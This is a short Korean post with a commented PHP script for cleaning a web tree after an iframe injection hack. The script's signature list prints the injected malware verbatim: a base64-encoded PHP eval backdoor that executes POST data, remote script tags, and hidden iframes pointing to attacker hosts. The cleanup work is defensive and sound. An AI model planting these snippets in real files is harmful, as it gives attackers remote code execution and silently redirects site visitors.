HACKING




iframe hacking 당한 후에 사용한 치료용 스크립트

실행한 디렉토리부터 하위에 있는 모든 파일을 다 뒤져서 감염된 파일을 수정하는 방식으로 되어 있다.


<?php
// Usage: cd to the root of the infected tree, then run `php -f kickHack.php`.
// No directory argument is read; the walk starts from the current working directory.
//
// $hackArr is the list of injected snippets to strip. Every entry is matched as an
// exact byte string by str_replace() in healFile(), so a variant that differs by a
// single character (another host, another filler string, different quoting) is NOT
// removed. A run that reports nothing therefore does not prove the tree is clean.
//
// NOTE(review): stripping these strings only undoes the visible injection. It does
// not tell you how the files were written in the first place; FTP/CMS credentials
// and file permissions still need to be reviewed, and the tree should be checked for
// other modified or newly dropped files.

$hackArr = array(
 // Server-side implant: a PHP block that eval()s a base64 blob. Decoded offline
 // (never by executing it), the blob appears to register an output-buffer handler
 // that re-inserts the <script> tag from the third entry into every page served,
 // and it ends with eval(base64_decode($_POST['e'])), i.e. it runs PHP sent in an
 // HTTP POST field. Any file that contained this entry gave remote code execution.
 '<?php eval(base64_decode(\'aWYoIWZ1bmN0aW9uX2V4aXN0cygndnIxJykpe2Z1bmN0aW9uIHZyMSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzcGhhVzU1Y205NExtTnZiUzlmY0hKcGRtRjBaUzlvWldGa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdnIxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHZyMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHZyMTEpKWNhbGxfdXNlcl9mdW5jKCR2cjExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2cjEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd2cjEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdnIxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndnIxMicpKSE9J3ZyMTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==\')); ?>',
 // Client-side injection as it shows up inside .js files: document.write() of a
 // remote <script> tag. The \/ in the closing tag is part of the matched bytes.
 'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
 // The same remote <script> tag as it shows up pasted directly into HTML/PHP output.
 '<script src=http://zainyrox.com/_private/header.php ></script>',
 // Iframe that sets its own src from the onload handler and forces height/width to 0.
 // The trailing run of letters looks like per-infection filler; if it differs in
 // other infected files this exact-match entry will miss them. TODO confirm on samples.
 '<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
 // Iframe wrapped in a display:none <div>, again preceded by what looks like filler text.
 '<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);



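// Root of the walk: the current working directory. getcwd() is used instead of
// $_SERVER['PWD'] because PWD is only an environment variable: it is absent on some
// platforms and can be stale or set by whoever launched the process.
$startDIR = getcwd();
if ($startDIR === false) {
    // getcwd() can fail (e.g. an unreadable parent directory); fall back to PWD.
    $startDIR = isset($_SERVER['PWD']) ? $_SERVER['PWD'] : '.';
}

// Absolute path of this script, so healFile() can skip it. Building it as
// PWD + '/' + PHP_SELF only worked when the script was started by bare file name
// from its own directory; with any other invocation (absolute path, ../kickHack.php)
// the comparison failed and the script stripped the signatures out of its own
// $hackArr, silently disarming itself for the next run.
$self = __FILE__;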


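/**
 * Recursively strip the known injected snippets from web files under $dir.
 *
 * Reads the globals $hackArr (list of exact byte strings to remove) and $self
 * (path of this script, which is never modified). Files whose extension is
 * htm, html, php, inc or js (compared case-insensitively, so INDEX.PHP is covered
 * too) are read, every $hackArr entry is removed with str_replace(), and the file
 * is rewritten in place only when at least one entry was found.
 *
 * Symbolic links are skipped, both files and directories: following them lets the
 * walk leave the tree being cleaned or loop forever, and on a compromised host a
 * link may have been planted to point this script at files outside the web root.
 * A link target that lives inside the tree is still cleaned through its real path.
 *
 * Files are overwritten without a backup. Copy the tree to a location outside the
 * web root first if the infected originals are needed for analysis.
 *
 * Prints "<dir> <count> found" for each directory in which files were rewritten
 * (count is per directory, not cumulative), plus one line per directory or file
 * that could not be read or written.
 *
 * @param string $dir directory to walk, without trailing slash
 * @return void
 */
function healFile($dir){
    global $hackArr, $self;

    $webExt = array('htm', 'html', 'php', 'inc', 'js');
    $matchcnt = 0;

    $files = scandir($dir);
    if ($files === false) {
        // An unreadable directory may still hold infected files; say so instead of
        // letting the run look complete.
        echo $dir." unreadable, skipped\n";
        return;
    }

    // Reverse order keeps the traversal (and output) order of the original
    // array_pop() loop.
    foreach (array_reverse($files) as $popname) {
        if ($popname === '.' || $popname === '..') {
            continue;
        }
        $theFile = $dir.'/'.$popname;

        if (is_link($theFile)) {
            continue;
        }
        if (is_dir($theFile)) {
            healFile($theFile);
            continue;
        }
        // Never rewrite this script: it contains every signature by design.
        if ($theFile === $self) {
            continue;
        }
        // Only regular files: reading a FIFO or device node would block or misbehave.
        if (!is_file($theFile)) {
            continue;
        }
        $ext = strtolower(pathinfo($popname, PATHINFO_EXTENSION));
        if (!in_array($ext, $webExt, true)) {
            continue;
        }

        $cont = file_get_contents($theFile);
        if ($cont === false) {
            echo $theFile." unreadable, skipped\n";
            continue;
        }

        $cnt = 0;
        $res = str_replace($hackArr, '', $cont, $cnt);
        if ($cnt > 0) {
            // Count the file as healed only when the cleaned content really reached disk.
            if (file_put_contents($theFile, $res) === false) {
                echo $theFile." write failed\n";
            } else {
                $matchcnt++;
            }
        }
    }

    if ($matchcnt > 0) {
        echo $dir.' '.$matchcnt." found\n";
    }
}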
// Entry point: walk the tree rooted at $startDIR and rewrite infected files in place.
healFile($startDIR);


?>
